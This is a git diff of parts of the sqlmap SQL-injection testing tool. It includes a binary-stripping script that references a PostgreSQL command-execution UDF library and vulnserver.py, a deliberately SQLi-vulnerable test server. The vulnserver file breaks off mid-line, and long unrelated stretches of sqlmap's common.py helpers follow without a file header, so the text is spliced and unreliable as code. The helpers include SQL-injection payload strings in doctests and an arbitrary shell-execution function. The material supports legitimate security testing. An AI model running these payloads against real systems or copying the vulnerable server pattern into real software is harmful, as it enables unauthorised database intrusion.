https://ptspts.blogspot.hr/2013/12/how-to-make-smaller-c-and-c-binaries.html + +# https://github.com/BR903/ELFkickers/tree/master/sstrip +# https://www.ubuntuupdates.org/package/core/cosmic/universe/updates/postgresql-server-dev-10 + +# For example: +# python ../../../../../extra/cloak/cloak.py -d -i lib_postgresqludf_sys.so_ +# ../../../../../extra/shutils/strip.sh lib_postgresqludf_sys.so +# python ../../../../../extra/cloak/cloak.py -i lib_postgresqludf_sys.so +# rm lib_postgresqludf_sys.so + +strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag $* +sstrip $* + diff --git a/src/sqlmap-master/extra/vulnserver/__init__.py b/src/sqlmap-master/extra/vulnserver/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/extra/vulnserver/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/extra/vulnserver/vulnserver.py b/src/sqlmap-master/extra/vulnserver/vulnserver.py new file mode 100644 index 0000000..cfa1d1b --- /dev/null +++ b/src/sqlmap-master/extra/vulnserver/vulnserver.py @@ -0,0 +1,259 @@ +#!/usr/bin/env python + +""" +vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes) + +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import base64 +import json +import re +import sqlite3 +import sys +import threading +import traceback + +PY3 = sys.version_info >= (3, 0) +UNICODE_ENCODING = "utf-8" +DEBUG = False + +if PY3: + from http.client import INTERNAL_SERVER_ERROR + from http.client import NOT_FOUND + from http.client import OK + from http.server import BaseHTTPRequestHandler + from http.server import HTTPServer + from socketserver import ThreadingMixIn + from urllib.parse import parse_qs + from urllib.parse import unquote_plus +else: + from BaseHTTPServer import BaseHTTPRequestHandler + from BaseHTTPServer import HTTPServer + from httplib import INTERNAL_SERVER_ERROR + from httplib import NOT_FOUND + from httplib import OK + from SocketServer import ThreadingMixIn + from urlparse import parse_qs + from urllib import unquote_plus + +SCHEMA = """ + CREATE TABLE users ( + id INTEGER, + name TEXT, + surname TEXT, + PRIMARY KEY (id) + ); + INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset'); + INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny'); + INSERT INTO users (id, name, surname) VALUES (3, 'wu', '179ad45c6ce2cb97cf1029e212046e81'); + INSERT INTO users (id, name, surname) VALUES (4, 'sqlmap/1.0-dev (https://sqlmap.org)', 'user agent header'); + INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull'); +""" + +LISTEN_ADDRESS = "localhost" +LISTEN_PORT = 8440 + +_conn = None +_cursor = None +_lock = None +_server = None +_alive = False + +def init(quiet=False): + global _conn + global _cursor + global _lock + + _conn = sqlite3.connect(":memory:", isolation_level=None, check_same_thread=False) + _cursor = _conn.cursor() + _lock = threading.Lock() + + _cursor.executescript(SCHEMA) + + if quiet: + global print + + def _(*args, **kwargs): + pass + + print = _ + +class ThreadingServer(ThreadingMixIn, HTTPServer): + def finish_request(self, *args, **kwargs): + try: + HTTPServer.finish_request(self, *args, **kwargs) + except Exception: + if DEBUG: + traceback.print_exc() + +class ReqHandler(BaseHTTPRequestHandler): + def do_REQUEST(self): + path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "") + params = {} + + if query: + params.update(parse_qs(query)) + + if "||%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), split, page) + retVal = re.sub(r"%s{2,}" % split, split, retVal) + retVal = htmlUnescape(retVal.strip().strip(split)) + + return retVal + +def getPageWordSet(page): + """ + Returns word set used in page content + + >>> sorted(getPageWordSet(u'foobartest')) == [u'foobar', u'test'] + True + """ + + retVal = set() + + # only if the page's charset has been successfully identified + if isinstance(page, six.string_types): + retVal = set(_.group(0) for _ in re.finditer(r"\w+", getFilteredPageContent(page))) + + return retVal + +def showStaticWords(firstPage, secondPage, minLength=3): + """ + Prints words appearing in two different response pages + + >>> showStaticWords("this is a test", "this is another test") + ['this'] + """ + + infoMsg = "finding static words in longest matching part of dynamic page content" + logger.info(infoMsg) + + firstPage = getFilteredPageContent(firstPage) + secondPage = getFilteredPageContent(secondPage) + + infoMsg = "static words: " + + if firstPage and secondPage: + match = SequenceMatcher(None, firstPage, secondPage).find_longest_match(0, len(firstPage), 0, len(secondPage)) + commonText = firstPage[match[0]:match[0] + match[2]] + commonWords = getPageWordSet(commonText) + else: + commonWords = None + + if commonWords: + commonWords = [_ for _ in commonWords if len(_) >= minLength] + commonWords.sort(key=functools.cmp_to_key(lambda a, b: cmp(a.lower(), b.lower()))) + + for word in commonWords: + infoMsg += "'%s', " % word + + infoMsg = infoMsg.rstrip(", ") + else: + infoMsg += "None" + + logger.info(infoMsg) + + return commonWords + +def isWindowsDriveLetterPath(filepath): + """ + Returns True if given filepath starts with a Windows drive letter + + >>> isWindowsDriveLetterPath('C:\\boot.ini') + True + >>> isWindowsDriveLetterPath('/var/log/apache.log') + False + """ + + return re.search(r"\A[\w]\:", filepath) is not None + +def posixToNtSlashes(filepath): + """ + Replaces all occurrences of Posix slashes in provided + filepath with NT backslashes + + >>> posixToNtSlashes('C:/Windows') + 'C:\\\\Windows' + """ + + return filepath.replace('/', '\\') if filepath else filepath + +def ntToPosixSlashes(filepath): + """ + Replaces all occurrences of NT backslashes in provided + filepath with Posix slashes + + >>> ntToPosixSlashes(r'C:\\Windows') + 'C:/Windows' + """ + + return filepath.replace('\\', '/') if filepath else filepath + +def isHexEncodedString(subject): + """ + Checks if the provided string is hex encoded + + >>> isHexEncodedString('DEADBEEF') + True + >>> isHexEncodedString('test') + False + """ + + return re.match(r"\A[0-9a-fA-Fx]+\Z", subject) is not None + +@cachedmethod +def getConsoleWidth(default=80): + """ + Returns console width + + >>> any((getConsoleWidth(), True)) + True + """ + + width = None + + if os.getenv("COLUMNS", "").isdigit(): + width = int(os.getenv("COLUMNS")) + else: + try: + output = shellExec("stty size") + match = re.search(r"\A\d+ (\d+)", output) + + if match: + width = int(match.group(1)) + except (OSError, MemoryError): + pass + + if width is None: + try: + import curses + + stdscr = curses.initscr() + _, width = stdscr.getmaxyx() + curses.endwin() + except: + pass + + return width or default + +def shellExec(cmd): + """ + Executes arbitrary shell command + + >>> shellExec('echo 1').strip() == '1' + True + """ + + retVal = "" + + try: + retVal = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate()[0] or "" + except Exception as ex: + retVal = getSafeExString(ex) + finally: + retVal = getText(retVal) + + return retVal + +def clearConsoleLine(forceOutput=False): + """ + Clears current console line + """ + + if IS_TTY: + dataToStdout("\r%s\r" % (" " * (getConsoleWidth() - 1)), forceOutput) + + kb.prependFlag = False + +def parseXmlFile(xmlFile, handler): + """ + Parses XML file by a given handler + """ + + try: + with contextlib.closing(io.StringIO(readCachedFileContent(xmlFile))) as stream: + parse(stream, handler) + except (SAXParseException, UnicodeError) as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) + +def getSQLSnippet(dbms, sfile, **variables): + """ + Returns content of SQL snippet located inside 'procs/' directory + + >>> 'RECONFIGURE' in getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") + True + """ + + if sfile.endswith('.sql') and os.path.exists(sfile): + filename = sfile + elif not sfile.endswith('.sql') and os.path.exists("%s.sql" % sfile): + filename = "%s.sql" % sfile + else: + filename = os.path.join(paths.SQLMAP_PROCS_PATH, DBMS_DIRECTORY_DICT[dbms], sfile if sfile.endswith('.sql') else "%s.sql" % sfile) + checkFile(filename) + + retVal = readCachedFileContent(filename) + retVal = re.sub(r"#.+", "", retVal) + retVal = re.sub(r";\s+", "; ", retVal).strip("\r\n") + + for _ in variables: + retVal = re.sub(r"%%%s%%" % _, variables[_].replace('\\', r'\\'), retVal) + + for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I): + retVal = retVal.replace(_, randomStr()) + + for _ in re.findall(r"%RANDINT\d+%", retVal, re.I): + retVal = retVal.replace(_, randomInt()) + + variables = re.findall(r"(? 1 else "", ", ".join(variables), sfile) + logger.error(errMsg) + + msg = "do you want to provide the substitution values? [y/N] " + + if readInput(msg, default='N', boolean=True): + for var in variables: + msg = "insert value for variable '%s': " % var + val = readInput(msg, default="") + retVal = retVal.replace(r"%%%s%%" % var, val) + + return retVal + +def readCachedFileContent(filename, mode="rb"): + """ + Cached reading of file content (avoiding multiple same file reading) + + >>> "readCachedFileContent" in readCachedFileContent(__file__) + True + """ + + if filename not in kb.cache.content: + with kb.locks.cache: + if filename not in kb.cache.content: + checkFile(filename) + try: + with openFile(filename, mode) as f: + kb.cache.content[filename] = f.read() + except (IOError, OSError, MemoryError) as ex: + errMsg = "something went wrong while trying " + errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) + + return kb.cache.content[filename] + +def average(values): + """ + Computes the arithmetic mean of a list of numbers. + + >>> "%.1f" % average([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) + '0.9' + """ + + return (1.0 * sum(values) / len(values)) if values else None + +@cachedmethod +def stdev(values): + """ + Computes standard deviation of a list of numbers. + + # Reference: http://www.goldb.org/corestats.html + + >>> "%.3f" % stdev([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) + '0.063' + """ + + if not values or len(values) < 2: + return None + else: + avg = average(values) + _ = 1.0 * sum(pow((_ or 0) - avg, 2) for _ in values) + return sqrt(_ / (len(values) - 1)) + +def calculateDeltaSeconds(start): + """ + Returns elapsed time from start till now + + >>> calculateDeltaSeconds(0) > 1151721660 + True + """ + + return time.time() - start + +def initCommonOutputs(): + """ + Initializes dictionary containing common output values used by "good samaritan" feature + + >>> initCommonOutputs(); "information_schema" in kb.commonOutputs["Databases"] + True + """ + + kb.commonOutputs = {} + key = None + + with openFile(paths.COMMON_OUTPUTS, 'r') as f: + for line in f: + if line.find('#') != -1: + line = line[:line.find('#')] + + line = line.strip() + + if len(line) > 1: + if line.startswith('[') and line.endswith(']'): + key = line[1:-1] + elif key: + if key not in kb.commonOutputs: + kb.commonOutputs[key] = set() + + if line not in kb.commonOutputs[key]: + kb.commonOutputs[key].add(line) + +def getFileItems(filename, commentPrefix='#', unicoded=True, lowercase=False, unique=False): + """ + Returns newline delimited items contained inside file + + >>> "SELECT" in getFileItems(paths.SQL_KEYWORDS) + True + """ + + retVal = list() if not unique else OrderedDict() + + if filename: + filename = filename.strip('"\'') + + checkFile(filename) + + try: + with openFile(filename, 'r', errors="ignore") if unicoded else open(filename, 'r') as f: + for line in f: + if commentPrefix: + if line.find(commentPrefix) != -1: + line = line[:line.find(commentPrefix)] + + line = line.strip() + + if line: + if lowercase: + line = line.lower() + + if unique and line in retVal: + continue + + if unique: + retVal[line] = True + else: + retVal.append(line) + except (IOError, OSError, MemoryError) as ex: + errMsg = "something went wrong while trying " + errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) + + return retVal if not unique else list(retVal.keys()) + +def goGoodSamaritan(prevValue, originalCharset): + """ + Function for retrieving parameters needed for common prediction (good + samaritan) feature. + + prevValue: retrieved query output so far (e.g. 'i'). + + Returns commonValue if there is a complete single match (in kb.partRun + of txt/common-outputs.txt under kb.partRun) regarding parameter + prevValue. If there is no single value match, but multiple, commonCharset is + returned containing more probable characters (retrieved from matched + values in txt/common-outputs.txt) together with the rest of charset as + otherCharset. + """ + + if kb.commonOutputs is None: + initCommonOutputs() + + predictionSet = set() + commonValue = None + commonPattern = None + countCommonValue = 0 + + # If the header (e.g. Databases) we are looking for has common + # outputs defined + if kb.partRun in kb.commonOutputs: + commonPartOutputs = kb.commonOutputs[kb.partRun] + commonPattern = commonFinderOnly(prevValue, commonPartOutputs) + + # If the longest common prefix is the same as previous value then + # do not consider it + if commonPattern and commonPattern == prevValue: + commonPattern = None + + # For each common output + for item in commonPartOutputs: + # Check if the common output (item) starts with prevValue + # where prevValue is the enumerated character(s) so far + if item.startswith(prevValue): + commonValue = item + countCommonValue += 1 + + if len(item) > len(prevValue): + char = item[len(prevValue)] + predictionSet.add(char) + + # Reset single value if there is more than one possible common + # output + if countCommonValue > 1: + commonValue = None + + commonCharset = [] + otherCharset = [] + + # Split the original charset into common chars (commonCharset) + # and other chars (otherCharset) + for ordChar in originalCharset: + if _unichr(ordChar) not in predictionSet: + otherCharset.append(ordChar) + else: + commonCharset.append(ordChar) + + commonCharset.sort() + + return commonValue, commonPattern, commonCharset, originalCharset + else: + return None, None, None, originalCharset + +def getPartRun(alias=True): + """ + Goes through call stack and finds constructs matching + conf.dbmsHandler.*. Returns it or its alias used in 'txt/common-outputs.txt' + """ + + retVal = None + commonPartsDict = optDict["Enumeration"] + + try: + stack = [item[4][0] if isinstance(item[4], list) else '' for item in inspect.stack()] + + # Goes backwards through the stack to find the conf.dbmsHandler method + # calling this function + for i in xrange(0, len(stack) - 1): + for regex in (r"self\.(get[^(]+)\(\)", r"conf\.dbmsHandler\.([^(]+)\(\)"): + match = re.search(regex, stack[i]) + + if match: + # This is the calling conf.dbmsHandler or self method + # (e.g. 'getDbms') + retVal = match.groups()[0] + break + + if retVal is not None: + break + + # Reference: http://coding.derkeiler.com/Archive/Python/comp.lang.python/2004-06/2267.html + except TypeError: + pass + + # Return the INI tag to consider for common outputs (e.g. 'Databases') + if alias: + return commonPartsDict[retVal][1] if isinstance(commonPartsDict.get(retVal), tuple) else retVal + else: + return retVal + +def longestCommonPrefix(*sequences): + """ + Returns longest common prefix occuring in given sequences + + # Reference: http://boredzo.org/blog/archives/2007-01-06/longest-common-prefix-in-python-2 + + >>> longestCommonPrefix('foobar', 'fobar') + 'fo' + """ + + if len(sequences) == 1: + return sequences[0] + + sequences = [pair[1] for pair in sorted((len(fi), fi) for fi in sequences)] + + if not sequences: + return None + + for i, comparison_ch in enumerate(sequences[0]): + for fi in sequences[1:]: + ch = fi[i] + + if ch != comparison_ch: + return fi[:i] + + return sequences[0] + +def commonFinderOnly(initial, sequence): + """ + Returns parts of sequence which start with the given initial string + + >>> commonFinderOnly("abcd", ["abcdefg", "foobar", "abcde"]) + 'abcde' + """ + + return longestCommonPrefix(*[_ for _ in sequence if _.startswith(initial)]) + +def pushValue(value): + """ + Push value to the stack (thread dependent) + """ + + exception = None + success = False + + for i in xrange(PUSH_VALUE_EXCEPTION_RETRY_COUNT): + try: + getCurrentThreadData().valueStack.append(copy.deepcopy(value)) + success = True + break + except Exception as ex: + exception = ex + + if not success: + getCurrentThreadData().valueStack.append(None) + + if exception: + raise exception + +def popValue(): + """ + Pop value from the stack (thread dependent) + + >>> pushValue('foobar') + >>> popValue() + 'foobar' + """ + + retVal = None + + try: + retVal = getCurrentThreadData().valueStack.pop() + except IndexError: + pass + + return retVal + +def wasLastResponseDBMSError(): + """ + Returns True if the last web request resulted in a (recognized) DBMS error page + """ + + threadData = getCurrentThreadData() + return threadData.lastErrorPage and threadData.lastErrorPage[0] == threadData.lastRequestUID + +def wasLastResponseHTTPError(): + """ + Returns True if the last web request resulted in an erroneous HTTP code (like 500) + """ + + threadData = getCurrentThreadData() + return threadData.lastHTTPError and threadData.lastHTTPError[0] == threadData.lastRequestUID + +def wasLastResponseDelayed(): + """ + Returns True if the last web request resulted in a time-delay + """ + + # 99.9999999997440% of all non time-based SQL injection affected + # response times should be inside +-7*stdev([normal response times]) + # Math reference: http://www.answers.com/topic/standard-deviation + + deviation = stdev(kb.responseTimes.get(kb.responseTimeMode, [])) + threadData = getCurrentThreadData() + + if deviation and not conf.direct and not conf.disableStats: + if len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: + warnMsg = "time-based standard deviation method used on a model " + warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES + logger.warning(warnMsg) + + lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation + retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit)) + + if not kb.testMode and retVal: + if kb.adjustTimeDelay is None: + msg = "do you want sqlmap to try to optimize value(s) " + msg += "for DBMS delay responses (option '--time-sec')? [Y/n] " + + kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if not readInput(msg, default='Y', boolean=True) else ADJUST_TIME_DELAY.YES + if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: + adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit) + + return retVal + else: + delta = threadData.lastQueryDuration - conf.timeSec + if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): # MySQL's SLEEP(X) lasts 0.05 seconds shorter on average + delta += 0.05 + return delta >= 0 + +def adjustTimeDelay(lastQueryDuration, lowerStdLimit): + """ + Provides tip for adjusting time delay in time-based data retrieval + """ + + candidate = (1 if not isHeavyQueryBased() else 2) + int(round(lowerStdLimit)) + + kb.delayCandidates = [candidate] + kb.delayCandidates[:-1] + + if all((_ == candidate for _ in kb.delayCandidates)) and candidate < conf.timeSec: + if lastQueryDuration / (1.0 * conf.timeSec / candidate) > MIN_VALID_DELAYED_RESPONSE: # Note: to prevent problems with fast responses for heavy-queries like RANDOMBLOB + conf.timeSec = candidate + + infoMsg = "adjusting time delay to " + infoMsg += "%d second%s due to good response times" % (conf.timeSec, 's' if conf.timeSec > 1 else '') + logger.info(infoMsg) + +def getLastRequestHTTPError(): + """ + Returns last HTTP error code + """ + + threadData = getCurrentThreadData() + return threadData.lastHTTPError[1] if threadData.lastHTTPError else None + +def extractErrorMessage(page): + """ + Returns reported error message from page if it founds one + + >>> getText(extractErrorMessage(u'Test\\nWarning: oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated

Only a test page

') ) + 'oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated' + >>> extractErrorMessage('Warning: This is only a dummy foobar test') is None + True + """ + + retVal = None + + if isinstance(page, six.string_types): + if wasLastResponseDBMSError(): + page = re.sub(r"<[^>]+>", "", page) + + for regex in ERROR_PARSING_REGEXES: + match = re.search(regex, page, re.IGNORECASE) + + if match: + candidate = htmlUnescape(match.group("result")).replace("
", "\n").strip() + if candidate and (1.0 * len(re.findall(r"[^A-Za-z,. ]", candidate)) / len(candidate) > MIN_ERROR_PARSING_NON_WRITING_RATIO): + retVal = candidate + break + + if not retVal and wasLastResponseDBMSError(): + match = re.search(r"[^\n]*SQL[^\n:]*:[^\n]*", page, re.IGNORECASE) + + if match: + retVal = match.group(0) + + return retVal + +def findLocalPort(ports): + """ + Find the first opened localhost port from a given list of ports (e.g. for Tor port checks) + """ + + retVal = None + + for port in ports: + try: + try: + s = socket._orig_socket(socket.AF_INET, socket.SOCK_STREAM) + except AttributeError: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((LOCALHOST, port)) + retVal = port + break + except socket.error: + pass + finally: + try: + s.close() + except socket.error: + pass + + return retVal + +def findMultipartPostBoundary(post): + """ + Finds value for a boundary parameter in given multipart POST body + + >>> findMultipartPostBoundary("-----------------------------9051914041544843365972754266\\nContent-Disposition: form-data; name=text\\n\\ndefault") + '9051914041544843365972754266' + """ + + retVal = None + + done = set() + candidates = [] + + for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""): + _ = match.group(1).strip().strip('-') + + if _ in done: + continue + else: + candidates.append((post.count(_), _)) + done.add(_) + + if candidates: + candidates.sort(key=lambda _: _[0], reverse=True) + retVal = candidates[0][1] + + return retVal + +def urldecode(value, encoding=None, unsafe="%%?&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, spaceplus=True): + """ + URL decodes given value + + >>> urldecode('AND%201%3E%282%2B3%29%23', convall=True) == 'AND 1>(2+3)#' + True + >>> urldecode('AND%201%3E%282%2B3%29%23', convall=False) == 'AND 1>(2%2B3)#' + True + >>> urldecode(b'AND%201%3E%282%2B3%29%23', convall=False) == 'AND 1>(2%2B3)#' + True + """ + + result = value + + if value: + value = getUnicode(value) + + if convall: + result = _urllib.parse.unquote_plus(value) if spaceplus else _urllib.parse.unquote(value) + else: + result = value + charset = set(string.printable) - set(unsafe) + + def _(match): + char = decodeHex(match.group(1), binary=False) + return char if char in charset else match.group(0) + + if spaceplus: + result = result.replace('+', ' ') # plus sign has a special meaning in URL encoded data (hence the usage of _urllib.parse.unquote_plus in convall case) + + result = re.sub(r"%([0-9a-fA-F]{2})", _, result or "") + + result = getUnicode(result, encoding or UNICODE_ENCODING) + + return result + +def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False): + """ + URL encodes given value + + >>> urlencode('AND 1>(2+3)#') + 'AND%201%3E%282%2B3%29%23' + >>> urlencode("AND COUNT(SELECT name FROM users WHERE name LIKE '%DBA%')>0") + 'AND%20COUNT%28SELECT%20name%20FROM%20users%20WHERE%20name%20LIKE%20%27%25DBA%25%27%29%3E0' + >>> urlencode("AND COUNT(SELECT name FROM users WHERE name LIKE '%_SYSTEM%')>0") + 'AND%20COUNT%28SELECT%20name%20FROM%20users%20WHERE%20name%20LIKE%20%27%25_SYSTEM%25%27%29%3E0' + >>> urlencode("SELECT NAME FROM TABLE WHERE VALUE LIKE '%SOME%BEGIN%'") + 'SELECT%20NAME%20FROM%20TABLE%20WHERE%20VALUE%20LIKE%20%27%25SOME%25BEGIN%25%27' + """ + + if conf.get("direct"): + return value + + count = 0 + result = None if value is None else "" + + if value: + value = re.sub(r"\b[$\w]+=", lambda match: match.group(0).replace('$', DOLLAR_MARKER), value) + + if Backend.isDbms(DBMS.MSSQL) and not kb.tamperFunctions and any(ord(_) > 255 for _ in value): + warnMsg = "if you experience problems with " + warnMsg += "non-ASCII identifier names " + warnMsg += "you are advised to rerun with '--tamper=charunicodeencode'" + singleTimeWarnMessage(warnMsg) + + if convall or safe is None: + safe = "" + + # corner case when character % really needs to be + # encoded (when not representing URL encoded char) + # except in cases when tampering scripts are used + if all('%' in _ for _ in (safe, value)) and not kb.tamperFunctions: + value = re.sub(r"(?i)\bLIKE\s+'[^']+'", lambda match: match.group(0).replace('%', "%25"), value) + value = re.sub(r"%(?![0-9a-fA-F]{2})", "%25", value) + + while True: + result = _urllib.parse.quote(getBytes(value), safe) + + if limit and len(result) > URLENCODE_CHAR_LIMIT: + if count >= len(URLENCODE_FAILSAFE_CHARS): + break + + while count < len(URLENCODE_FAILSAFE_CHARS): + safe += URLENCODE_FAILSAFE_CHARS[count] + count += 1 + if safe[-1] in value: + break + else: + break + + if spaceplus: + result = result.replace(_urllib.parse.quote(' '), '+') + + result = result.replace(DOLLAR_MARKER, '$') + + return result + +def runningAsAdmin(): + """ + Returns True if the current process is run under admin privileges + """ + + isAdmin = None + + if PLATFORM in ("posix", "mac"): + _ = os.geteuid() + + isAdmin = isinstance(_, (float, six.integer_types)) and _ == 0 + elif IS_WIN: + import ctypes + + _ = ctypes.windll.shell32.IsUserAnAdmin() + + isAdmin = isinstance(_, (float, six.integer_types)) and _ == 1 + else: + errMsg = "sqlmap is not able to check if you are running it " + errMsg += "as an administrator account on this platform. " + errMsg += "sqlmap will assume that you are an administrator " + errMsg += "which is mandatory for the requested takeover attack " + errMsg += "to work properly" + logger.error(errMsg) + + isAdmin = True + + return isAdmin + +def logHTTPTraffic(requestLogMsg, responseLogMsg, startTime=None, endTime=None): + """ + Logs HTTP traffic to the output file + """ + + if conf.harFile: + conf.httpCollector.collectRequest(requestLogMsg, responseLogMsg, startTime, endTime) + + if conf.trafficFile: + with kb.locks.log: + dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep)) + dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep)) + dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep)) + +def getPageTemplate(payload, place): # Cross-referenced function + raise NotImplementedError + +@cachedmethod +def getPublicTypeMembers(type_, onlyValues=False): + """ + Useful for getting members from types (e.g. in enums) + + >>> [_ for _ in getPublicTypeMembers(OS, True)] + ['Linux', 'Windows'] + >>> [_ for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True)] + [1, 2, 3, 4, 5, 6] + """ + + retVal = [] + + for name, value in inspect.getmembers(type_): + if not name.startswith("__"): + if not onlyValues: + retVal.append((name, value)) + else: + retVal.append(value) + + return retVal + +def enumValueToNameLookup(type_, value_): + """ + Returns name of a enum member with a given value + + >>> enumValueToNameLookup(SORT_ORDER, 100) + 'LAST' + """ + + retVal = None + + for name, value in getPublicTypeMembers(type_): + if value == value_: + retVal = name + break + + return retVal + +@cachedmethod +def extractRegexResult(regex, content, flags=0): + """ + Returns 'result' group value from a possible match with regex on a given + content + + >>> extractRegexResult(r'a(?P[^g]+)g', 'abcdefg') + 'bcdef' + >>> extractRegexResult(r'a(?P[^g]+)g', 'ABCDEFG', re.I) + 'BCDEF' + """ + + retVal = None + + if regex and content and "?P" in regex: + if isinstance(content, six.binary_type) and isinstance(regex, six.text_type): + regex = getBytes(regex) + + match = re.search(regex, content, flags) + + if match: + retVal = match.group("result") + + return retVal + +def extractTextTagContent(page): + """ + Returns list containing content from "textual" tags + + >>> extractTextTagContent('Title
foobar
Link') + ['Title', 'foobar'] + """ + + page = page or "" + + if REFLECTED_VALUE_MARKER in page: + try: + page = re.sub(r"(?i)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page) + except MemoryError: + page = page.replace(REFLECTED_VALUE_MARKER, "") + + return filterNone(_.group("result").strip() for _ in re.finditer(TEXT_TAG_REGEX, page)) + +def trimAlphaNum(value): + """ + Trims alpha numeric characters from start and ending of a given value + + >>> trimAlphaNum('AND 1>(2+3)-- foobar') + ' 1>(2+3)-- ' + """ + + while value and value[-1].isalnum(): + value = value[:-1] + + while value and value[0].isalnum(): + value = value[1:] + + return value + +def isNumPosStrValue(value): + """ + Returns True if value is a string (or integer) with a positive integer representation + + >>> isNumPosStrValue(1) + True + >>> isNumPosStrValue('1') + True + >>> isNumPosStrValue(0) + False + >>> isNumPosStrValue('-2') + False + >>> isNumPosStrValue('100000000000000000000') + False + """ + + retVal = False + + try: + retVal = ((hasattr(value, "isdigit") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT + except ValueError: + pass + + return retVal + +@cachedmethod +def aliasToDbmsEnum(dbms): + """ + Returns major DBMS name from a given alias + + >>> aliasToDbmsEnum('mssql') + 'Microsoft SQL Server' + """ + + retVal = None + + if dbms: + for key, item in DBMS_DICT.items(): + if dbms.lower() in item[0] or dbms.lower() == key.lower(): + retVal = key + break + + return retVal + +def findDynamicContent(firstPage, secondPage): + """ + This function checks if the provided pages have dynamic content. If they + are dynamic, proper markings will be made + + >>> findDynamicContent("Lorem ipsum dolor sit amet, congue tation referrentur ei sed. Ne nec legimus habemus recusabo, natum reque et per. Facer tritani reprehendunt eos id, modus constituam est te. Usu sumo indoctum ad, pri paulo molestiae complectitur no.", "Lorem ipsum dolor sit amet, congue tation referrentur ei sed. Ne nec legimus habemus recusabo, natum reque et per. Facer tritani reprehendunt eos id, modus constituam est te. Usu sumo indoctum ad, pri paulo molestiae complectitur no.") + >>> kb.dynamicMarkings + [('natum reque et per. ', 'Facer tritani repreh')] + """ + + if not firstPage or not secondPage: + return + + infoMsg = "searching for dynamic content" + singleTimeLogMessage(infoMsg) + + blocks = list(SequenceMatcher(None, firstPage, secondPage).get_matching_blocks()) + kb.dynamicMarkings = [] + + # Removing too small matching blocks + for block in blocks[:]: + (_, _, length) = block + + if length <= 2 * DYNAMICITY_BOUNDARY_LENGTH: + blocks.remove(block) + + # Making of dynamic markings based on prefix/suffix principle + if len(blocks) > 0: + blocks.insert(0, None) + blocks.append(None) + + for i in xrange(len(blocks) - 1): + prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None + suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None + + if prefix is None and blocks[i + 1][0] == 0: + continue + + if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)): + continue + + if prefix and suffix: + prefix = prefix[-DYNAMICITY_BOUNDARY_LENGTH:] + suffix = suffix[:DYNAMICITY_BOUNDARY_LENGTH] + + for _ in (firstPage, secondPage): + match = re.search(r"(?s)%s(.+)%s" % (re.escape(prefix), re.escape(suffix)), _) + if match: + infix = match.group(1) + if infix[0].isalnum(): + prefix = trimAlphaNum(prefix) + if infix[-1].isalnum(): + suffix = trimAlphaNum(suffix) + break + + kb.dynamicMarkings.append((prefix if prefix else None, suffix if suffix else None)) + + if len(kb.dynamicMarkings) > 0: + infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '') + singleTimeLogMessage(infoMsg) + +def removeDynamicContent(page): + """ + Removing dynamic content from supplied page basing removal on + precalculated dynamic markings + """ + + if page: + for item in kb.dynamicMarkings: + prefix, suffix = item + + if prefix is None and suffix is None: + continue + elif prefix is None: + page = re.sub(r"(?s)^.+%s" % re.escape(suffix), suffix.replace('\\', r'\\'), page) + elif suffix is None: + page = re.sub(r"(?s)%s.+$" % re.escape(prefix), prefix.replace('\\', r'\\'), page) + else: + page = re.sub(r"(?s)%s.+%s" % (re.escape(prefix), re.escape(suffix)), "%s%s" % (prefix.replace('\\', r'\\'), suffix.replace('\\', r'\\')), page) + + return page + +def filterStringValue(value, charRegex, replacement=""): + """ + Returns string value consisting 